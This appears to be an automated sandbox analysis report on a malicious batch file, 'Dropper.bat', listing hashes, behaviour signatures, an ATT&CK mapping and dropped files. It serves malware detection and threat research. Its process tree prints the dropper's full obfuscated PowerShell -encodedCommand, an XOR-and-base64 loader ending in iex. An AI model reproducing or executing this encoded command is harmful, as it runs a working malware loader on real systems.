3464395edcce5e6148164c463f2fe5fdc5b92f4cdc175db8c4b2c50bb89b5eaf

General

Target

Dropper.bat
Size

6KB
MD5

569d507e7fdc933deff3b58813d97aa4
SHA1

51024acd8743f7373d822fb12b51051f8a56863d
SHA256

3464395edcce5e6148164c463f2fe5fdc5b92f4cdc175db8c4b2c50bb89b5eaf
SHA512

08044c392db675232715f6105463ebfb7287bf926ccbb1322b5b1f9556696c8d9f070cd10a639f04fc5afa5930f2fd37ead4700624d13ef88575b95aefa1cde8
SSDEEP

192:qQofeU+tLohTleG/wnO6ppxi5zBgH6sgUJ:zof5+tLohTleawO6jxi5zBYgO

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
17	3280	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3280	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3280	powershell.exe
3280	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3280	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 3980 wrote to memory of 3280	3980	cmd.exe	86
PID 3980 wrote to memory of 3280	3980	cmd.exe	86
PID 3280 wrote to memory of 4952	3280	powershell.exe	87
PID 3280 wrote to memory of 4952	3280	powershell.exe	87
PID 4952 wrote to memory of 1856	4952	csc.exe	88
PID 4952 wrote to memory of 1856	4952	csc.exe	88

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Dropper.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3980
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoExit -encodedCommand JABoAGUAaABlAGgAZQAgAD0AIAAiAGQAaQBFAGcATQBYAEoAdgBjAGgASgB3AFgAMQBnAG4ASQBUAHMAOABOAFgASQBCAEsAeQBFAG0ATgB6ADkAcABYADEAZwBuAEkAVABzADgATgBYAEkAQgBLAHkARQBtAE4AegA5ADgAQQBDAGMAOABKAGoAcwAvAE4AMwB3AGIAUABDAFkAMwBJAEQAMABpAEEAVABjAGcASgBEAHMAeABOAHkARgBwAFgAMQBnAG4ASQBUAHMAOABOAFgASQBCAEsAeQBFAG0ATgB6ADkAOABCAGoAbwBnAE4AegBNADIATwB6AHcAMQBhAFYAOQBZAFgAMQBnAGkASgB6AEEAKwBPAHoARgB5AE0AVAA0AHoASQBTAEYAeQBBAGoATQBtAE0AVABwAGYAVwBDAGwAZgBXAEgASgB5AGMAbgBJAEoARgBqADQAKwBHAHoAOABpAFAAUwBBAG0AZQBuAEEANQBOAHkAQQA4AE4AegA1AGgAWQBIAEIANwBEADEAOQBZAGMAbgBKAHkAYwBpAEkAbgBNAEQANAA3AE0AWABJAGgASgBqAE0AbQBPAHoARgB5AE4AeQBvAG0ATgB5AEEAOABjAGgAcwA4AEoAZwBJAG0ASQBIAEkAVgBOAHkAWQBDAEkARAAwAHgARQB6AFkAMgBJAEQAYwBoAEkAWABvAGIAUABDAFkAQwBKAGkAQgB5AE8AaAA4ADkATgBpAGMAKwBOADMANQB5AEkAUwBZAGcATwB6AHcAMQBjAGkASQBnAFAAVABFAGMATQB6ADgAMwBlADIAbABmAFcASABKAHkAYwBuAEkASgBGAGoANAArAEcAegA4AGkAUABTAEEAbQBlAG4AQQA1AE4AeQBBADgATgB6ADUAaABZAEgAQgA3AEQAMQA5AFkAYwBuAEoAeQBjAGkASQBuAE0ARAA0ADcATQBYAEkAaABKAGoATQBtAE8AegBGAHkATgB5AG8AbQBOAHkAQQA4AGMAaABzADgASgBnAEkAbQBJAEgASQBlAFAAVABNADIASABqAHMAdwBJAEQATQBnAEsAMwBvAGgASgBpAEEANwBQAEQAVgB5AFAARABNAC8ATgAzAHQAcABYADEAaAB5AGMAbgBKAHkAQwBSAFkAKwBQAGgAcwAvAEkAagAwAGcASgBuAHAAdwBPAFQAYwBnAFAARABjACsAWQBXAEIAdwBlAHcAOQBmAFcASABKAHkAYwBuAEkAaQBKAHoAQQArAE8AegBGAHkASQBTAFkAegBKAGoAcwB4AGMAagBjAHEASgBqAGMAZwBQAEgASQB3AFAAVAAwACsAYwBnAFEANwBJAEMAWQBuAE0AegA0AEMASQBEADAAbQBOAHoARQBtAGUAaABzADgASgBnAEkAbQBJAEgASQArAEkAaABNADIATgBpAEEAMwBJAFMARgArAGMAZwBjAGIAUABDAFoAaABZAEgASQAyAEoAUQBFADcASwBEAGQAKwBjAGkAYwA3AFAAQwBaAHkATgBEADQAYwBOAHkAVQBDAEkARAAwAG0ATgB6AEUAbQBmAG4ASQA5AEoAeQBaAHkASgB6AHMAOABKAG4ASQArAEkAagBRACsASABUADQAMgBBAGkAQQA5AEoAagBjAHgASgBuAHQAcABYADEAaAB5AGMAbgBKAHkASQBpAGMAdwBQAGoAcwB4AGMAaQBFAG0ATQB5AFkANwBNAFgASQBrAFAAVABzADIAYwBoAEEAcgBJAGoATQBoAEkAWABwADcAWAAxAGgAeQBjAG4ASgB5AEsAVgA5AFkAYwBuAEoAeQBjAG4ASgB5AGMAbgBJAGIAUABDAFkAQwBKAGkAQgB5AFAAagBzAHcAYwBtADkAeQBIAGoAMAB6AE4AaAA0ADcATQBDAEEAegBJAEMAdAA2AGMARABOAHcAZQBYAEEALwBjAEgAbAB3AEkAVAB0ADgAYwBIAGwAdwBOAGoANAArAGMASAB0AHAAWAAxAGgAeQBjAG4ASgB5AGMAbgBKAHkAYwBoAHMAOABKAGcASQBtAEkASABJAHoAUAB5AEUANwBjAG0AOQB5AEYAVABjAG0AQQBpAEEAOQBNAFIATQAyAE4AaQBBADMASQBTAEYANgBQAGoAcwB3AGYAbgBKAHcARQB6ADkAdwBlAFgAQQBoAGMASABsAHcATwB3AEUAeABNAHoAeAB3AGUAWABBAFEAYwBIAGwAdwBKAHoAUQAwAE4AeQBCAHcAZQAyAGwAZgBXAEgASgB5AGMAbgBKAHkAYwBuAEoAeQBHAHoAdwBtAEEAaQBZAGcAYwBqAFEANwBQAEQATQArAGMAbQA5AHkARwB6AHcAbQBBAGkAWQBnAGYAQgBNADIATgBuAG8AegBQAHkARQA3AGYAbgBKAGkASwBtAHQAbgBlADIAbABmAFcASABKAHkAYwBuAEoAeQBjAG4ASgB5AEoAegBzADgASgBuAEkAOQBQAGoAWgB5AGIAMwBKAGkAYQBWADkAWQBjAG4ASgB5AGMAbgBKAHkAYwBuAEkARQBPAHkAQQBtAEoAegBNACsAQQBpAEEAOQBKAGoAYwB4AEoAbgBvADAATwB6AHcAegBQAG4ANQB5AGUAZwBjAGIAUABDAFoAaABZAEgAdABpAEsAbQBOACsAYwBtAEkAcQBaAG0ASgArAGMAagAwAG4ASgBuAEkAOQBQAGoAWgA3AGEAVgA5AFkAWAAxAGgAeQBjAG4ASgB5AGMAbgBKAHkAYwBoAEUAOQBQAEMARQA5AFAAagBkADgAQgBTAEEANwBKAGoAYwBlAE8AegB3ADMAZQBqADAAKwBOAG4AdABwAFgAMQBoAHkAYwBuAEoAeQBjAG4ASgB5AGMAagBBAHIASgBqAGMASgBEADMASQBpAE0AeQBZAHgATwBuAEoAdgBjAGoAdwAzAEoAWABJAHcASwB5AFkAMwBDAFEAOQB5AEsAWABKAGkASwBtAFYAbgBjAGkAOQBwAFgAMQBoAGYAVwBIAEoAeQBjAG4ASgB5AGMAbgBKAHkASAB6AE0AZwBJAFQAbwB6AFAAbgB3AFIAUABTAEkAcgBlAGkASQB6AEoAagBFADYAZgBuAEoAaQBmAG4ASQAwAE8AegB3AHoAUABuADUAeQBZADMAdABwAFgAMQBoAGYAVwBIAEoAeQBjAG4ASgB5AGMAbgBKAHkAQgBEAHMAZwBKAGkAYwB6AFAAZwBJAGcAUABTAFkAMwBNAFMAWgA2AE4ARABzADgATQB6ADUAKwBjAG4AbwBIAEcAegB3AG0AWQBXAEIANwBZAGkAcABqAGYAbgBJADkAUABqAFoAKwBjAGoAMABuAEoAbgBJADkAUABqAFoANwBhAFYAOQBZAGMAbgBKAHkAYwBpADkAZgBXAEMAOQBmAFcASABBAFMAWAAxAGgAZgBXAEIATQAyAE4AbgA4AEcASwB5AEkAMwBjAG4AWQBoAEkARABGAHkAZgB4ADQAegBQAEQAVQBuAE0AegBVADMAYwBoAEUAQgBPAGoATQBnAEkAbgBKAGYAVwBGADkAWQBDAFEASQB6AEoAagBFADYARAAyAGgAbwBFAEMAcwBpAE0AeQBFAGgAZQBuAHQAZgBXAEgARgB5AEEAQgBjAFQARgBuAEkAUgBFAHcAQQBYAEYAQQBjAGUASABnAHQAZgBXAEgARgB5AEEAQgBjAEMASABoAE0AUgBGADMASQBHAEcAaABkAHkASABoAHMAYwBHAFgASQBUAEgAQgBaAHkARQB4AFEARwBGAHcAQgB5AEIAaABvAFgAYwBoADAASABCAGcASQBIAEIAbgBJAEwASABRAGQAeQBCAFIATQBjAEIAbgBJAEcASABYAEkAUQBGADMASQBSAEUAeAA0AGUARgB4AFoAeQBFAHgAdwBXAGMAZwBBAFgASABCAE0AZgBGADMASQBHAEcAaABkAHkAQgBoAGMAaABKAG4AdwAzAEsAagBkAHkAQgBoADEAeQBFAHgAdwBMAEIAaABvAGIASABCAFYAeQBDAHgAMABIAGMAZwBVAFQASABBAFoAZgBXAEMAVQAxAE4AeQBaAHkAYwBEAG8AbQBKAGkASQBoAGEASAAxADkASgBTAFUAbABmAEQAWQBnAFAAUwBJAHcAUABTAHAAOABNAFQAMAAvAGYAUwBFAHgAUABuADAAMABPADMAMAArAE0AUwBFADgATgBHAFUAaABJADIARgBsAEsAMgBNACsAWgBtAG8ALwBLAEQAeABsAEoAVwBkADkARwBuADgAZABKAHkAWQBpAEoAeQBaADgATgB5AG8AMwBiAFMAQQArAE8AVABjAHIAYgB6AHMAdwBKAGoARgBpAFkAaQBJAGkATwBqAFUAagBKAFcAWgBqAFkARwB0AGgAUABTAGcAcQBQAEQAQgBnAFkAegBCADAASQBTAFoAdgBLAEMAaABoAEsAegBBAHcATwBTAFIAMABOAGoANQB2AFkAMwBCAHkAZgB4ADEAeQBjAEIARgBvAEQAZwBjAGgATgB5AEEAaABEAG4AWQAzAFAAQwBSAG8AQgB3AEUAWABBAEIAdwBUAEgAeABjAE8ARQB5AEkAaQBGAGoATQBtAE0AdwA0AGUAUABUAEUAegBQAGcANABHAE4AegA4AGkARABoAHAALwBIAFMAYwBtAEkAaQBjAG0AZgBEAGMAcQBOADMAQgBmAFcAQQBFAG0ATQB5AEEAbQBmAHcASQBnAFAAVABFADMASQBTAEYAeQBmAHgAUQA3AFAAagBjAEMATQB5AFkANgBjAG4AQQBSAGEAQQA0AEgASQBUAGMAZwBJAFEANQAyAE4AegB3AGsAYQBBAGMAQgBGAHcAQQBjAEUAeAA4AFgARABoAE0AaQBJAGgAWQB6AEoAagBNAE8ASABqADAAeABNAHoANABPAEIAagBjAC8ASQBnADQAYQBmAHgAMABuAEoAaQBJAG4ASgBuAHcAMwBLAGoAZAB3AGMAZwA9AD0AIgANAAoAJABYAG8AcgBfAFYAYQBsACAAPQAgADgAMgANAAoAJAB4AHIAIAA9ACAAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGgAZQBoAGUAaABlACkADQAKACQAZgBhAGYAYQBmACAAPQAgACQAeAByACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAByAGUAdAB1AHIAbgAgACQAXwAgAC0AYgB4AG8AcgAgACQAWABvAHIAXwBWAGEAbAAgAH0ADQAKACQAZABlAGMAcwBjAHIAIAA9ACAAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AHUAdABmADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAZgBhAGYAYQBmACkADQAKAGkAZQB4ACAAJABkAGUAYwBzAGMAcgANAAoA
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3280
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xrf0p5ea\xrf0p5ea.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4952
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES415E.tmp" "c:\Users\Admin\AppData\Local\Temp\xrf0p5ea\CSCA14B21B3CEE34713A48D6E9FEDA0E851.TMP"
      4⤵
      PID:1856

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\H-Output.exe

Filesize
56KB

MD5
6f2e0879d7bd3105ae29eb15f13a2188

SHA1
70861590ba3c18180dcacd85c22722830d8bfb95

SHA256
7aa0dd623de0b968f581c23d68b2390fb979fc860df51bc9b61be28f958bdb6e

SHA512
6c5e3aedab499d3e44b271505cd96e37a4ab57eca4c332378a4d27522587a8514cd76d19886bebac43e84596ec0d21dda182a6e52becb96506ceb808d5be82c7

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES415E.tmp

Filesize
1KB

MD5
631e13b0d1c6902c02a4c9de29ba01ee

SHA1
a2e1760bf5748f5ee34b10b2d638881ffc8cb837

SHA256
47e8b7a3c813c33b5a3a8e80596f174fed2aadd5b2a6cfed42021851dbb7fe1a

SHA512
fc8c332a31231e84d941443b30ba07dd41b2daccdb8191fcc34dc4435371bfecfb8b0b857ce5024d19be6e7dd6f137af88fda033ba16522dbc3326a403c3e56c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g43jpuil.ljv.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\xrf0p5ea\xrf0p5ea.dll

Filesize
3KB

MD5
839ba002a06689afe51de1631725fece

SHA1
8e55b6f7b37789fb4aed2a3cd96e477623a5d081

SHA256
0411bd00fc94f58d1ff9ea95fdcd9420bd0430299c71cf937fa354452387af4c

SHA512
29d9248427d00e20754e5bc8f766f16a8dab6a6961a5d65176e714f8dd6cd5e5baf00864c7617e68f917497a1e2d89559a2f6afa406ac48fa9e90dc8fbff63fe

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xrf0p5ea\CSCA14B21B3CEE34713A48D6E9FEDA0E851.TMP

Filesize
652B

MD5
be3cce2717323677fae4cadc02bed389

SHA1
cb9ba0bc6e8eb6d385bb7b4d9e5bc72c280d8b06

SHA256
bcc2b6a6f1976bc4876b8c2edecda34d4f165ee72da0dae9a7385ddf02be2465

SHA512
4d9bfa9d543d4474d96dd2bfa0eb56e4f6f50698a5bd92fde39ea81a48c256574fb59ac20832722edcaba8f064301d83594975f09c23d689cf6971c1615a05a4

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xrf0p5ea\xrf0p5ea.0.cs

Filesize
954B

MD5
60c0d4aebef0d650d89729e1bf02de63

SHA1
4f1499e94be62af8a4ece3a8c505b3766c338ff7

SHA256
0b6e580ba0c5bbb2ac19e2fe91bacb79d1b18cab8c07150e6a944b6ace5d7799

SHA512
9e6233b5c2e2cf6ce4b883b33349541c5e7f6f75f711af37d352df8b72d70ac3d123cdccd2fed674d69da5fad3e27de9a7acc92864d47a69d6f8a6d98867760a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xrf0p5ea\xrf0p5ea.cmdline

Filesize
369B

MD5
c699c031a565bae7c884ef9cdb6914a6

SHA1
1ee09017d483d147c196ea48c8a76600e195220d

SHA256
6b9782a83df6954a87ebe35ec663f5ff6f0ca670ea9238889175fe709bd0e2c8

SHA512
aac639445cdb2213d6764f1c7637bb03851d5a30ac823a0bf9217519552060ddf911d1a7d9177abe4996328238c95d7c4c66181daec7c4c6f9e1a7fb8b6a299a

Download Submit
memory/3280-11-0x00007FF8E8C50000-0x00007FF8E9711000-memory.dmp

Filesize
10.8MB

Download
memory/3280-0-0x00007FF8E8C53000-0x00007FF8E8C55000-memory.dmp

Filesize
8KB

Download
memory/3280-12-0x00007FF8E8C50000-0x00007FF8E9711000-memory.dmp

Filesize
10.8MB

Download
memory/3280-26-0x00000221460C0000-0x00000221460C8000-memory.dmp

Filesize
32KB

Download
memory/3280-13-0x0000022146340000-0x0000022146384000-memory.dmp

Filesize
272KB

Download
memory/3280-6-0x000002212D2F0000-0x000002212D312000-memory.dmp

Filesize
136KB

Download
memory/3280-37-0x00007FF8E8C50000-0x00007FF8E9711000-memory.dmp

Filesize
10.8MB

Download
memory/3280-38-0x00007FF8E8C50000-0x00007FF8E9711000-memory.dmp

Filesize
10.8MB

Download
memory/3280-39-0x0000022146590000-0x0000022146606000-memory.dmp

Filesize
472KB

Download
memory/3280-41-0x00007FF8E8C53000-0x00007FF8E8C55000-memory.dmp

Filesize
8KB

Download
memory/3280-42-0x00007FF8E8C50000-0x00007FF8E9711000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing